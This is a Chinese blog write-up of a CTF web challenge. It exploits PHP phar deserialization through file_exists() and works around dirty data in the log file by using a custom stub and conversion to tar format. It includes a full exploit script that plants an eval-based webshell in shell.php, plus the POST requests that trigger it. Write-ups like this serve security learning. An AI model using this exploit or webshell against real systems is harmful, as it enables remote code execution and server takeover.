网络安全平台测试赛 easyphp(phar脏数据处理)

已于 2023-03-05 13:54:33 修改
阅读量1.7k 收藏 6
点赞数 3
分类专栏: php 比赛wp 文章标签: php 开发语言
于 2023-03-05 13:45:54 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_63231007/article/details/129344165
版权
比赛wp 同时被 2 个专栏收录
20 篇文章 1 订阅
订阅专栏
php
14 篇文章 1 订阅
订阅专栏

昨天的比赛,14.00-17.00.时间有点紧张,比赛期间没拿下来这道 😭非常痛苦,很顺畅的思路 一步步想下来,卡在最后一步末尾脏数据处理了,最后时间到了 没打通,还需多练

这里本地复现一下:

看一下附件里的 logger.php 

<?php
error_reporting(0);
class Logger{
    private $filename;
    private $content;
    private $endContent;

    function __construct($filename,$endContent){
        $this->filename = $filename;
        $this->endContent = $endContent;
    }

    function info($content){
        !file_exists(dirname($this->filename)) ? mkdir(dirname($this->filename)) : "";
        $content = "Type:INFO Messsage:$content";
        $file = fopen($this->filename,"a");
        fwrite($file,$content);
        fclose($file);
    }

    function __destruct(){
        $this->info($this->endContent);
    }
}

$time = time();
$logger = new Logger("log/info.log","Close at $time");
$fileName = $_POST['file'];
$userName = $_POST["name"] ?? "nothing";
if (file_exists($fileName)){
    echo "File exists";
    $logger->info("$userName");
}else{
    echo "File does not exist";
    $logger->info("$userName");
}
?>

审一下,大题就是 POST传入file和name参数,执行file_exists($fileName) 不管是否存在,都会执行 $logger->info($userName);  logger::info()函数功能为 往 $this->filename里 fopen($filename,"a") 写入传入的name参数的内容。 也就是往 log/info.log里。

然后函数执行完毕,对象销毁的时候,执行一次 __destruct()函数,再往log/info.log 写入 Close at $time

由于不存在反序列化函数unserialize(), 因此这个$logger这个对象里 $this->name 是不可控的,就是 log/info.log

$logger = new Logger("log/info.log","Close at $time");

但是 file_exists()会触发phar反序列化,同时结合上面 我们可以写入 log/info.log文件,那我们是不是可以通过 post name参数,post 一个我们构造好的phar文件内容,写入到 log/info.log文件里。由于phar:// 协议可以解析其他后缀(主要是看文件内容,不看后缀), 因此我们再次通过file_exists()去触发 phar反序列化,触发__destruct(),从而 通过 构造好的序列化meta数据 $this->filename, $this->endContent 往filename 写入我们要执行的命令(🐎)

 原理是这样,没错。 但是,,, 你看看log/info.log里的东西

payload为我们phar文件内容,但是很明显info.log并不是纯正的phar文件,里面有脏东西的,,

由于签名部分的存在,php会校验文件哈希值,并检查末尾是否为GBMB,如下是解析部分的源码: 

 phar文件的格式,签名 不允许他前后有东西,解析不了 这怎么办????

这里涉及到了脏数据的处理,解决方法:

(1) 绕过前面的脏数据

这里我们可以看到,它前面会给我们加上"Type:INFO Messsage:",phar文件是有签名标准的,签名多了这么一段 会使得签名无效。但是这个是很容易绕过的,这个就比较类似于 之前phar题里的一种图片头绕过,前面需要是GIF89a 。我们只需要在生成phar文件时 setStub 代码里改成

$phar = new Phar("poc.phar"); //文件名
$phar->startBuffering();
/* 设置stub,必须要以__HALT_COMPILER(); ?>结尾 */
$phar->setStub("Type:INFO Messsage:"."<?php __HALT_COMPILER(); ?>");
/* 设置自定义的metadata,序列化存储,解析时会被反序列化 */
$phar->setMetaData($c);
/* 添加要压缩的文件 */
$phar->addFromString("test1.txt","test1");
//签名自动计算
$phar->stopBuffering();

这样在生成文件的时候,会自动前面好,因此这个是非常好绕过的。我们来010editor里看一下生成的phar文件里是什么:

 可以看到前面加上了 "Type:INFO Messsage:"。

回到这道题,我们可以在这样生成phar文件之后,由于题目往log/info.log文件里写内容时,会自己加上"Type:INFO Messsage:",因此我们只需要给 name传构造好的phar文件里"Type:INFO Messsage:" 后面的文件内容(url编码一下) 就可以解决前面脏数据对phar文件解析的影响

但是,在文件执行完,对象销毁的时候,他还会往log/info.log 里写进其他的东西,md 后面又多了一段脏数据: "Type:INFO Messsage:Close at 1677925012"   当时就卡这里了

(2) 通过 tar 绕过phar后面的脏数据

 phar文件如果末尾不是GBMB会直接导致解析失败。我们知道一句话木马由于有<?php ?>这样的头尾标识存在,可以无视前后脏数据;然而对于phar,这样的骚操作被签名部分阻止了

那这个没法绕过吗? 可以的 。

利用convertToExecutable函数,我们可以把phar文件转为其他格式的phar文件,例如.tar和.zip格式

 如果以 tar文件格式储存phar,会使得它不会受后面数据的影响,(这是tar的格式决定的)

当然不止有tar,还有其他格式,对应的转化代码:

<?php
$phar = $phar->convertToExecutable(Phar::TAR,Phar::BZ2);//会生成xxxx.phar.tar.bz2
$phar = $phar->convertToExecutable(Phar::TAR,Phar::GZ);//会生成xxxx.phar.tar.gz
$phar = $phar->convertToExecutable(Phar::ZIP);//会生成xxxx.phar.zip

这里注意就是 

$phar = $phar->convertToExecutable(Phar::TAR); //会生成*.phar.tar**
$phar->startBuffering();
$phar->addFromString("Type:INFO Messsage:","");
//tar文件开头是第一个添加文件的的文件名,注意添加的文件顺序不要错了

$phar->setStub("Type:INFO Messsage:"."<?php __HALT_COMPILER(); ?>"); //设置stub


$phar->setMetadata($test); //将自定义的meta-data存入manifest

//签名自动计算
$phar->stopBuffering();

exp如下:

<?php
unlink("a.phar.tar");
class Logger{
    private $filename = "/var/www/html/shell.php";
    private $endContent = '<?php eval($_POST["shell"]);?>';
}
$log = "Type:INFO Messsage:";
$log_len = strlen($log);

$phar = new Phar("a.phar"); //后缀名必须为phar
$phar = $phar->convertToExecutable(Phar::TAR); //会生成*.phar.tar**

$phar->startBuffering();

$phar->addFromString("Type:INFO Messsage:","");
//tar文件开头是第一个添加文件的的文件名,注意添加的文件顺序不要错了
$phar->setStub("Type:INFO Messsage:"."<?php __HALT_COMPILER(); ?>"); //设置stub

$test = new Logger();
$phar->setMetadata($test); //将自定义的meta-data存入manifest

//签名自动计算
$phar->stopBuffering();

$exp = file_get_contents("./a.phar.tar");
$post_exp = substr($exp, $log_len);
echo rawurlencode($post_exp); //urlencode输出数据流

生成exp后

先post name=exp&file=aa

然后post name=&file=phar://./log/info.log去触发phar反序列化

成功写入shell.php 

 参考:https://www.cnblogs.com/yyy2015c01/p/phar-deserialization.html

葫芦娃42
关注
  • 3
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
渗透测试系列:脏数据绕过waf,Yakit爆破base64编码密码,ssh无密码登录受害主机
weixin_54626591的博客
01-30 77
脏数据绕过waf,Yakit爆破base64编码密码,ssh无密码登录受害主机
攻防世界--easyphp
最新发布
qq_51802152的博客
12-17 803
攻防世界--easyphp
[ISITDTU 2019]EasyPHP
m0_62905261的博客
10-04 1698
[ISITDTU 2019]EasyPHP
攻防世界-web- easyphp
32bin的博客
10-30 1196
最近在学习CTF web相关知识,顺带学习php,在攻防世界平台上做做题。遇到了一道名为easyphp的题目,对我这个新手一点也不easy,于是决定把过程记录下来。版权声明:本文为CSDN博主「weixin_46906325」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。原文链接:https://blog.csdn.net/weixin_46906325/article/details/127154789。#攻防世界-web- easyphp。依次构造a、b、c的值!
【xctf之easyphp
qq_40646572的博客
10-11 700
题目如上,这个题需要绕过很多。。首先考虑参数A的绕过a参数不可以为空,并且intval($a)的值大于6000000,而且长度不能大于3。那有什么好说的,这个intval()可以用科学计数法进行绕过,直接1e8,对于a参数的拦截已经绕过。下面来看b参数的绕过,关于b参数,要求8b184b与他的substr(md5($b),-6,6)值相等,这个说实话,一开始我想到的是不是可以绕过,但后来发现好像不太行,然后就使用爆破了。
EasyPHP3+Mantis1.2快速搭建安装免费开源的中文缺陷管理平台
02-21
EasyPHP下载地址http://easyphp.org/index.phpMantis下载地址http://www.mantisbt.org/准备好安装文件:安装EasyPHP安装完成,运行EasyPHP,可以看到托盘中有一个黑色的e标志的图标,双击他打开EasyPHP控制台,查看...
EasyPHP
07-22
资源名称:EasyPHP工具简介:EasyPHP帮助你使用PHP管理数据、开发站点和应用程序。它是调试PHP程序的好东西,集成: Apache , PHP , MySQL , Zend , PhpMyAdmin 为一体的web环境套件相关图片: 资源太大,传百度网盘了...
EasyPHP5-3-14
07-22
资源名称:EasyPHP5-3-14工具简介:EasyPHP帮助你使用PHP管理数据、开发站点和应用程序。它是调试PHP程序的好东西,集成: Apache , PHP , MySQL , Zend , PhpMyAdmin 为一体的web环境套件相关图片: 资源太大,传百度...
EasyPHP5-2-17.zip
07-11
EasyPHP帮助你使用PHP管理数据、开发站点和应用程序。它是调试PHP程序的好东西,集成: Apache , PHP , MySQL , Zend , PhpMyAdmin 为一体的web环境套件
绕过安全狗继续注入的思路
08-30
绕过安全狗继续注入的思路。
网络技术 — Easy-ip适用的场景及配置
热门推荐
Pangpangbupang.
07-15 1万+
1.什么是Easy ip? Easy-ip是NAPT的一种特例是单向转换的,配置时候不需要创建公网地址池。NAPT是实现私有IP和NAT的公共IP之间的动态转换。Easy-ip是实现公网IP 地址实现与私网IP 地址之间的映射。适合小型局域网接入Internet的情况,比如小型网吧,中小型企业。出接口通过拨号方式获得临时(或固定)公网IP 地址以供内部主机访问Internet。 2.配置详情如下图: ...
[GYCTF2020]Easyphp
qq_62046696的博客
12-15 459
我们可以知道登陆成功的条件:① 用户名存在,且$this->password的md5值与数据库查询的用户密码相同。然后在 update.php界面,进行传参,这时候用户名为admin密码随意,因为session[name]设置为了admin了,默认加php。因为age和nickname都可以post进行传参,nickname在后面,如果改age还需要加nickname,也就是age,nickname的序列化,然后经过了safe过滤,这就要用到反序列化逃逸了,不然序列化出来的是。echo('用户不存在!
[WP]第五届XMan选拔web
xiongshivigor的博客
08-11 359
第五届XMan选拔 本次比一共三道web,一道签到题就不用说了,另外两道貌似也都不是很难的题,但是确实水个人平太菜,没都做做出来,还是逐步积累经验吧 easyphp <?php error_reporting(0); highlight_file(__FILE__); class XMAN{ public $class; public $para; public $check; public function __construct() {
首届数据安全大web
羽的博客
11-08 4995
首届数据安全大web
【WAF绕过】绕过XX狗
命运的旋律的博客
04-13 1482
XX狗 萌新学习之路上必绕的XX狗 搭建过程 搭建过程比较简单,但存在一些小问题 具体说一下我所遇到的 在安装过程中会自动弹出一个配置菜单,需要输入网站信息。一般来讲这些信息会自动获取,但是我所使用的phpstudy2018版即使安装apache但在服务中也无法找到正确服务名。 解决方法: 需要将phpstudy配置成为系统服务 安装并开启apache服务 如果在服务还是没有找到apache...
easyphp(xctf)
m0_56107268的博客
11-13 556
php一些函数的绕过
phar反序列化小结
Lethe's Blog
11-13 2989
0x00 phar反序列化 phar反序列化即在文件系统函数(file_exists()、is_dir()等)参数可控的情况下,配合phar://伪协议,可以不依赖unserialize()直接进行反序列化操作。 关于其他反序列化的总结,可以看我的这篇文章 0x01 原理 首先了解一下phar文件的结构,一个phar文件由四部分构成: a stub:可以理解为一个标志,格式为xxx<...
攻防世界 easyphp
09-11
EasyPHP中,攻防世界是一个基于CTF(Capture The Flag)制的在线平台,旨在提供网络安全学习和竞的机会。 攻防世界平台上有各种不同的题目和挑战,涵盖了网络安全的多个方面,包括但不限于Web漏洞、系统漏洞...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值